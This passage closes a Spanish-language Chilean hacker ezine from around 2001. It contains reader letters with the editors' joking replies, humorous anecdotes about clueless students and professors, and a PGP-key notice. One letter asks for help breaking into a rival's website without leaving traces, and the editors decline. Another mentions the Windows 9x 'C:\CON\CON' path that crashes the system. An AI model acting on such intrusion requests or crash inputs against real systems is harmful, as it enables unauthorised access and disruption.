Mr.Nexus: Te escribo a ti ya que eres con el que mas me represento. Me he leido todas las Ezines y tus articulos tambiin, y me parecen por decirlo de alguna forma "excelente material" y es basico para formar la nueva informatica, mucho mejor que los largos y extensos manuales de web, ingenieria, y de la pearson & de de la mcgraw que me tuve que mamar en la U. [Nex: Bueno, bueno, .. eso ya es decir mucho, creo que yo tan solo he escrito un articulo decente, ese de spoofing que salio en la R numero 7 u 8. Pero esta claro que donde este un buen libro de McGraw, Prentice, o lo que sea, que se quite cualquier articulo (o la mayoria ...)] [Tkr: Nex.. me vas ganando por 1 articulo... que ya algun dia te alcanzare..] Bueno, al punto :necesito una ayudita con un jil que es enfermo de puntudo, ademas de desvirtuar en varios grupos de noticias a los hackers , ultimamente me ha estado hinchando con mails y mas mails instandome a que le hackei el sitio(aunque se declara ignorante). Te pido ayuda tactica mas que tecnica, ya que en eso soy bueno. Tactica en el sentido de hacking sin dejar rastro, de la mejor forma de acceder a su gran basural sin moverle ni un papel higienico. me sigues? Si puedes ayudarme te lo agradeceria. [Nex: Bueno, aqui no pretendemos inducir a realizar nada ilegal asi que no aceptaremos cosas asi ... aun asi, ese site esta down.] PD: su sitio es www.xuxasumadre.cl y este el ultimo de sus famosos recaditos... "a las finales la web es mia vcoloko la wea ke kiera, estos hacker de jardin infantil de ke te las day aweonao, si no necesito ser informatico pa tener una web, seguro vos no tenis idea aweonao master jajajajaja te espero WebMaster" eso seria adios Jorge [Nex: Bueno, idiotas los hay en todos lados, y desafortunadamente son muchos. Ignoralo.] <->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<-> De: IDLE [mailto:xxxxxxxxx] Enviado el: Viernes, 06 de Abril de 2001 15:40 Para: CDLR Asunto: CDLR Contacto Pongo a vuesta disposicion el dominio hackers.cl no se esta haciendo nada bueno en el y yo soy el due~o. Atte iDLE [ Tkr: Debian ponerle earthquake.cl o algo asi...]

[Plx : que me quedo el mouse tiriton .. mejor reviso los rodillitos .. como dice chack por ahi] <->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<-> De: Rodrigo [mailto:rigo_evert@xxxxx.com] Asunto: CDLR Contacto Chile no es un pais totalmente computarizado en estos dias, asi que toda la info que necesitamos para adelantar el paso perdido, gran parte llega por los internautas chilenos, que sin mala intencion ingresan como cualquier persona del mundo a un sistema informatico.......... los chilenos queremos a nuestro pais y no destruiremos nada que nos sirva o pertenesca.... chile debe avanzar a pasos mas agigantado, y con nos. lo lograra........ si no nos apoyan y ayudan, otras personas de otros paises se veran beneficiadas..... y las victimas no seremos nosotros........sino el gobierno Hck [Nex: Uf, que tema mas delicado, todos en contra del gobierno,.. Tee, habla xDD] [ Tkr: www.la-nacion.net no tengo nada que ver ahi, pero me agrada la idea] [CHack: Estimado Rodrigo, Mi pais quisiera estar totalmente computarizado pero en algunos lugares falta luz, y no tenemos cables de poder tan largos.] <->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<-> De: Juan Arce Avila [mailto:leagce@xxxxx.com] Asunto: CDLR Contacto Caballeros, uno de mis clientes realizara un evento internacional, me solicito me ponga en contacto con ustedes para que se encarguen de la seguridad en este vento. ?Hacen este tipo de trabajo?, con quien puedo conversar para hablar del proyecto? [Nex: Con alguna buena compa~ia de seguridad.] [CHack: Estimado Juan, yo elijo ser el cuidador de la puerta.] [cucumber: Como CDLR no podemos hacer trabajos remunerados, ya que como dice nuestro dominio (cdlr.org) somos un grupo sin fines de lucro. Gracias de todos modos.] [Tkr: Yo iria de mil amores.. pero.. tengo que cuidar mi gatito... lo siento] [Plx: Pues ya lo tengo Chack se encarga de la puerta .. el copete lo cuida Taker y cucu , Nexus echa a los borrachos y yo reparto los condones ... espero que acepte la propuesta] <->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<-> De: Camilo Dosque [mailto:cdosque@xxxx.net] Asunto: CDLR Contacto hola amigos soy un empresario muy metido en este asunto me gustaria

apollarlos ya que estamos pronto a levantar 2 pag una de seguridad - y otra de linux linux-de-chile.com y osso.cl esperando alguna respuesta CDH- k3d0z... [ Plx: Camilo espero que nos apoyes con la HACKIT 2002] <->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<-> De: CaNOPuS Lacerta [mailto:beehive38@xxxxx.com] Asunto: CDLR Contacto Hace un tiempo lei que existe (o mejor dicho, existia) un error en Windows 9x, el cual consistia en escribir el path "C:\CON\CON". Lo probe sobre mi PC y funcions. Luego pensi que CON podrma ser una referencia al dispositivo "COnsole" del DOS. Probe "C:\NUL\NUL" y tambien funciona. Lo mismo con CLOCK$. Mi pregunta es: ?Porque sucede eso? El error estaba en el sistema VFAT. Pero ?por que? Es algo que me encantaria saber. Si pueden, contactense via mail conmigo. Gracias por todo, y sigan asi. La ezine es excelente. [ Tkr: En teoria, podria decirse que este es un error de redundancia ciclica, es decir: si te encuentras en la ciudad a y deseas dezplazarte a la ciudad a, es decir de a a a, pues nos encontramos en un ciclo redundante ya que si luego de eso deseas regresar a tu punto incial tendrias lo siguiente: recorrido: a a a a a y asi sucesivamente despues de este trayecto quieres regresar a la ciudad anterior pues tendrias a a a a a a a Etc, esa es la idea... perdon, de que estabamos hablando..??] <->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<-> De: IRIDIUM [mailto:SPEC_PRO@xxxxxxxxx.COM] Asunto: CDLR Contacto Como estan muchacho, me entere ahce algun tiempo de uds por un tipo que iba en la micro y me hablo de esta pagina de hacker, la verdad es que quisiera ser uno, ya que estudio ingenieria en computacion (3er a~o) y realmente me interesa aprender cirtas tecnicas es por eso mi visita, les reujo que me ense~en a ser un Hacker eso si con solidos principios, enviandome manuales o donde los puedo bajar haci tambien como programas , desde ya muchas gracias ........ I R I D I U M [PLX: Ese fui yop .-. jejej pues lo vi leyendo @rroba, para que gastar monedas cuando el conocimientos es gratis !!!] [Tkr: Ha, el viejo truco de la publicidad gratuita en la micro] [CHack: Estimado IRIDIUM, date una vuelta por zine store de entrada ahi encontraras bastante informacion http://members.nbci.com/zine_store/] <->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<-> De: Devil_Angel [mailto:devil_angel@xxxxxxxx.net] Asunto: CDLR Contacto

La pagina esta excelente, el contenido es de primera categoria y enseqan el verdadero espiritu del HacK, que no es hacer daqo, sino que demostrar que aun no hay nada seguro.. en Chile o en el Mundo.. SALUD2! [CHack: Estimado Devil_Angel, lo unico seguro es la muerte de lo vivo.] <->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<-> De: Z@R [mailto:zar@xxxx.cl] Asunto: CDLR Contacto felicidades, hace mucho tiempo que los sigo y realmente se pasaron , los felicito, sigan pa delante [Nex: Gracias ... ] [CHack: Estimado Z@R, Gracias, seguiremos adelante pero luego se nos atraviesan las paredes] <->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<-> De: tata8 [mailto:eltata@xxxxxxx.net] Enviado el: Miercoles, 14 de Marzo de 2001 2:53 Para: CDLR Asunto: CDLR Contacto Hola como estan, siempre estoy en contacto con uds, y pienso que son lejos la mejor y mas etica agrupacion chilena informatica. 1ro no soy hacker, solamente intento serlo pero muy humildemente , comparado con los genios que andan por ahi, estoy muy lejos de eso. Mi consulta: yo creo que es muy basica para uds pero para mi no y seria una gran ayuda, creo que me instalaron un troyano en mi pc, porque noto cosas super raras cuando estoy conectado el cursor del mause se mueve solo y tengo el pc con errores que no tenia nunca, y muchas cosas mas, me gustaria que me ayudaran a saber como saber si realmente tengo un troyano o que puede ser y como proteger mi pc lo mas posible, uso win98 2 edicion, no entiendo mucho sobre los puertos y cosas por el estilo. he leido bastante del tema y he hecho algunas cosillas por ahi pero siempre con el fin de mostrar lo bulnerable del sys nunca destruyendolos. [Nex: La mejor proteccion para ese tipo de cosas, segun mi opinion, es tener cuidado con las cosas que se ejecutan. Un antivirus actualizado no esta de mas. Y en contra de la creencia popular, yo no estoy a favor de los firewalls personales esos, ... saltan por nada y hacen creer a la gente que esta siendo atacada por cualquier paquete extra~o que reciben, bah!] [CHack: Estimado tata8, hace un tiempo me paso algo similar ya que el cursor se movia solo. Intente todo, antivirus, norton, reinstalar, exorcismos y bueno nada funciono hasta que limpie el mecanismo del raton y santo remedio.] [Tkr: Si nada de lo anterior te funciona, y los antivirus no encuentran ningun programa "extra~o" creo que lo mejor es que reinstales nuevamente todo... empezando desde cero para mayor seguridad... y recuerda tener backups de tus datos antes de empezar...] Bueno me despido y me encantaria que me pudieran ayudar esperando pronta respuesta se despide uno mas de sus seguidores...

<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<-> De: df [mailto:a@ss.jj] Asunto: CDLR Contacto como es posible que siendo hackers desarrolen sus paginas en programas de .asp de microsoft y front page una verguenza [TeeSPy: verguenza ? por ke verguenza ? Microsoft existe, y hay ke adecuarse a eso, por lo demas, asp es muy util, y no tiene nada de malo usarlo. Solo por ke microsoft creo cierta cosa no hay ke usarla ?? lo bueno se aprovecha, provenga de kien provenga. No por ke casi todo lo de MS sea malo (:P), hay ke desconocer lo bueno. No se bien ke tan buenos son asp y frontpage en implementacion, pero mi respuesta va mas ke nada dirigida a tu prejuicio. Yo no tengo verguenza, ke opinan uds ? :) ] [CHack: Estimado df , te informo que la traduccion de "hacker" no es "anti microsoft"] [cucumber: ASP corre en linux tambien. Oh.. ahora no podremos usar linux tampoco! :( ] [Tkr: Yo si decia que alguien se daria cuenta si no le cambiabamos la extension a esas paginas... lo juro.. lo juro.. yo intente poner *.php, pero al intentar entrar me daba un error de File not fuckin' found... No se que pueda ser.... por eso me toco dejarlas como estaban... pd. si el *.php no te gusta puedes cambiarlo por *.html me da los mismo... s*ck*r] [Plx: Pues simple .. la page la hizo una amiga dise~adora grafica .. no creo que se de la paja de hacerlo en notepad como tu lo haras me imaginos .. pues tu eres Elite verdad ? . Si tenemos nuestro hosting en un servidor NT que mas practico que ocupar ASP.] <->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<-> De: 4831 [mailto:sillas_4831@xxxxx.com] Asunto: CDLR Contacto los felicito por su labor. Quiero felicitar en especial a paxius, por que no critica a los que vamos empesando, yo estudie a nivel tecnico la carrera de informatica y desde entonces me empese a interesar por los temas que aqui se tratan. Les pido un favor por el millon de personas que vamos empesando, ayuden a quienes se lo poden. Gracias.. Espero contunuar en contacto con ustedes. En mi trabajo no se permite trabajar directamente con los sistemas operativos, solamente shell, y quisiera me informaran algun sitio para vajar linux y poder practicar, ya que en la oficina se trabaja con Unix. [Nex: www.linuxiso.org ] [CHack: Estimado 4831, gracias, el linux lo puedes bajar de muchisimos lados, inclusive ya en muchas revistas viene incluido.]

[Tkr: Ya te han dicho de donde bajarlo... pero yo queria incluir algo... nos gusta ayudar a la gente, pero a la gente que pregunte de buena forma, pq es que hay unos que buffff... como dice el mono de yanomeacuerdo quien... me saca la p*ta piedra..!!! Cuenta con nosotros...] [Plx: No le cuenten a nadie ... ftp.tie.cl .. ahi hay algunos ISO`s] PD. Cria cuervos y tendras muchos.. [Tkr: Cria lombrices y tendras muchas mas... se reproducen en un 100% en un periodo de un mes..!! y solo comen desechos organicos...] [Plx: Cria conejos .. y veras lo calineten que son estos animalejos .. que vida no ?] :-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-: -:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:..--:: 17 Chistes, cuentos y otras burradas ::--.. by General Failure Este texto relata las aventuras de Sysoy, un profesor de informatica de alguna universidad. Para que vean que tan preparados y capacitados estan algunos profesores y alumnos de este pais. Si alguno de estos casos coinciden con algun hecho de la vida real, es simplemente eso, una mera coincidencia y nada mas. Las aventuras de Sysoy. Alumno: Oye, hice este documento en mi casa, pero aqui no me carga... Sysoy: Bien. Que procesador de textos usaste? Alumno: Windows, version 95... Sysoy: No, quiero decir con que programa, no el sistema operativo. Alumno: Windows... Sysoy: No. Windows es el sistema. Lo que quiero saber es el programa. Por ejemplo, puede haber sido Microsoft Word, Wordpad o WordPerfect... [al alumno se le ilumina la cara] Alumno: Ah, claro! Fue con Microsoft Windows 95... [aun no se como no lo mate] Alumno: Oye, tengo un problema con un disquete que he metido en la disquetera y ahora no se como sacarlo... [cuando voy a mirar, compruebo que el alumno se las ha arregado para meter el disquete por la ranura de uno de los puertos... Normal que tuviera problemas para sacarlo.] Alumno: Me puedes grabar Internet en este disquete? [tentado estuve de grabarle el "acceso directo a Internet Explorer" y hacerle feliz...] Alumno: No me entra la password en mi cuenta, me salen asteroides... [me llevo un par de tensos segundos darme cuenta de que queria decir "asteriscos"] Profesor: Oye Sysoy, en la sala de arriba queremos pasar nuestros documentos a un nuevo sistema.

Es muy complicado? Sysoy: Bueno, depende (ambiguo como buen chileno). Que software estan usando? [expresion confusa en la cara del profe] Profesor: Software? No usamos ningun software... [vaya, computadores telepatas... y yo aqui con un pentium III en el escritorio] Alumno: Oye, me valdra la pena instalar Windows 78? [si, claro] Alumno: Necesito pasar esta imagen a mi cuenta para un trabajo Sysoy: Bueno, te la paso por FTP en un rato Alumno: No, no puede ser, la imagen tiene que ir en JPEG [siempre he dicho que eso de los acronimos es un peligro publico...] Alumno: En mi computador de la casa tengo problemas instalando la tarjeta Ethernet en mi disco duro. [no me extra~a; ...y ya me hubiera gustado saber para que queria ese buitre una tarjeta Ethernet en su casa] Alumno: Mi CPU no es lento, tiene un disco duro de 200 kegabytes [tres patadas en 12 palabras... deberia haber mandado esto al libro Guinness para que homologaran el record] Alumno: Oye, Windows no me funciona, no se por que. Puede haber sido por cambiar el nombre del directorio WINDOWS a VENTANAS? [noooo, debe ser la crisis asiatica...] Alumno: Se puede usar Word en los ordenadores del Departamento 6? [nota: eran estaciones Sun] Sysoy: No, esos ordenadores usan UNIX Alumno: Ah, claro, UNIX usa una version de DOS muy antigua [confieso que me costo un poco recuperarme de esta] Alumno: Como puedo quitar mi PC del escritorio? Sysoy [confundido]: Que pasa, esta atornillado a la mesa o que? Alumno: Te estai haciendo el simpatico, viejo? Sysoy [mas confundido]: No, no, ... a ver, donde quieres poner tu PC? En el suelo? Alumno: Me estai molestandoh? ME ESTAI VACILANDO, NO?! Sysoy [a la defensiva]: Tranquilo, vamos por partes, eh? Me puedes explicar el problema con un poco mas de detalle? Alumno [mirandome como si yo fuera un idiota profundo]: Mira, he quitado Internet, he quitado el Outlook y he quitado Mis Documentos, pero no puedo quitar Mi PC. Ni la Papelera de Reciclaje tampoco... [.. uf! por que la gente no hablara con comillas?] Alumno: Oye, creo que hay ficheros corrompidos en el ordenador con el que trabajo... Sysoy: Por que crees eso? Alumno: Los abro y sale basura. Mira... [acto seguido me lleva a un computador, arranca MSDOS, tira el EDIT y abre... COMMAND.COM!!!] Sysoy [sonrisa sarcastica]: Estoy de acuerdo en que es basura, pero... [Por la cara de idiota que me puso, me parece que no me cacho la talla] [en cierta ocasion estaba ense~ando los servidores departamentales a un grupo de alumnos del primer curso... Habia un DG 300 como servidor de terminales, donde se conectaban clientes bajo NT, X Window, y otros

entornos] Sysoy: ...Y esto es un servidor DG 300 corriendo bajo DG/UX 5.4 Alumno: Que es eso? Sysoy: El sistema operativo. Alumno: Corre bajo NT? Sysoy: No, es DG/UX, un sistema operativo. Es una variante de UNIX. Corre por si solo Alumno: Ah, o sea, arrancas NT y... [este jabali seguro que fue empleado de Microsoft] [en uno de los departamentos habia un MV-10000 corriendo bajo RSTS-E; si a nadie le suena esto, no me extra~a nada, porque este sistema fue dise~ado antes de que nacieramos... El caso es que por lo visto tenian problemas restaurando el sistema desde un backup, y me llamaron para investigar] Sysoy: Cuantas cintas hay de backup? Profesor [poniendo cara de que cachaba]: Una Sysoy: Una? Son casi 30 Gb de volumen. Puedo ver la cinta? [me pasan una cinta Travan de 2 Gb] Sysoy: Aqui es imposible que este todo Profesor [haciendose el ofendido]: Te aseguro que esta todo, yo mismo lo grabe [me mostro lo que habia hecho, que era usar los esotericos comandos del sistema para formatear la cinta... y eso era todo; pensaba que el formateo incluia ya el backup] [lo bueno era el curso de Pascal que les daban a los alumnos, sobre todo si tenemos en cuenta que mucha gente nunca habia tenido contacto con computadores] Alumno: Por que no me corre un programa que he hecho? Se me bloquea la maquina Sysoy: Lo has hecho en Turbo Pascal? Alumno: Si, pero al ejecutarlo se bloquea Sysoy: No te tira errores al compilar? Alumno: Compelar? Que es eso? [perplejo, me entere de que para ejecutarlo simplemente le cambiaba la extension .PAS a .EXE] [esta es solo para programadores] [en otra ocasion hubo un curso de C y UNIX para varios ingenieros trabajado en Macintosh (lease: Pascal) hasta entonces; la cosa es mirando su codigo fuente me lo encontre *lleno* de sentencias strcat(string,"\0");] Sysoy: Y Por que ponen esto todo el tiempo? Alumno: No sabes que en C todas las cadenas tienen que acabar en [nadie se habia molestado en explicarles que strcat no funciona a la cadena ya este acabada en cero, claro] que habian que

cero? menos que

Alumno: Apague el pc, lo he vuelto a encender, y me sigue diciendo que ya puedo apagar el equipo Sysoy: Eso es imposible Alumno: Te lo juro, ven a ver [fuimos] Alumno: Mira. Apago. Enciendo... Sysoy: Eso es el monitor. [ojala me dieran luca por cada vez que he visto esto o una variante :) ...] Profesor: Me puedes instalar 60 nanosegundos mas de RAM en mi computador? [un caso claro de oir campanas y no saber donde] Alumno: Esto son filtros contra las radiaciones nucleares de los monitores?

[si no me tire al suelo muerto de la risa fue por un ejercicio de autocontrol supremo] Alumno: El computador me dice que pulse OK, pero no encuentro esa tecla [ni siquiera se le habia ocurrido pulsar la "O" y luego la "K"] Alumno: Quiero escribir un 0 en mayusculas. Como lo hago? [ya me gustaria a mi saberlo...] Profesor: Tenemos un PC XT antiguo con una disquetera y queremos... Sysoy: Espere, es una disquetera de 3"1/2 o de 5"1/4? Profesor: Cual es la diferencia? [lo que demuestra que cualquiera puede dar clases en una universidad] Alumno: Me los discos de instalacion de Windows para instalarlo en el computador de mi papa, pero no me instala... Sysoy [discos? es un chico paciente, anticuado, pero paciente]: Te da algun mensaje de error? Alumno: Si, lo anote... [el papel decia "Este no es un disco Macintosh. Desea inicializarlo?] Alumno: Oye, este disquete funcionara en los computadores de la sala 8? Es azul... [reconozco que esa vez me quede literalmente sin palabras] Profesor: Cuanto puede costar una caja de discos duros? [mas de lo que piensa, "profesor"...] [Al ver venir a este profesor me prepare para todo] Profesor: Me compre una impresora, pero no me funciona. No se si viene con tinta o sin ella... Sysoy: Que impresora es? Profesor: Una DeskJet. Sysoy: Hay varias. Que modelo? Profesor: Eeehhh... no se, es una HP... Sysoy: Bueno, es en color o en blanco y negro? Profesor: Es gris... [esta nunca se la cree nadie, pero si conocieran al profesor les sorprenderia...] Profesor: Nos falla la conexion a Internet en el laboratorio, creo que el modem no tiene suficiente RAM... [me gustaria saber de donde saca la gente ciertas ideas...] [Esta es la que mas se me ha repetido] Profesor: Oye, mira. El pc me esta pidiendo que pulse la tecla ANY y no la encuentro... [El muy bestia ni siquiera habian probado presionando "A","N","Y"...] Sysoy: Al boton de RESET se le conoce como tecla ANY. Profesor [con cara de aliviado]: Oh, gracias... sabes mucho. [de mas esta decir que nunca me ha perdonado eso] [La otra vez vi que un grupo de profesores se estaban burlando de otro profe, me acerque a reirme un poco] Sysoy: Hola, de que se rien? Profes: Je... Es que este otro dijo que habia pasado 12 hora seguidas en el computador. [no me atrevi a decirles que yo me he pasado mas de 28 horas sin parar]

General Failure. :-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-: -:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:..--:: 18 Llaves PGP ::--.. by CDLR Nunca jamas hemos recibido ni un solo mail encriptado, que verguenza, pero en fin, por si alguien quiere escribir algo delicado, o si simplemente quiere mantener un minimo de privacidad, aqui puedes encontrar las llaves de todos los miembros de CDLR. www.cdlr.org/llaves/ :-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-: -:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:..--:: 19 EOF::--.. by Editor Llegamos al fin de otro numero mas de nuestra querida R, si te ha gustado, genial, si no, .. envianos un articulo mejor :D :-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-: -:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:"El ser hacker yo lo veo un poco como ser hippie" Cucumber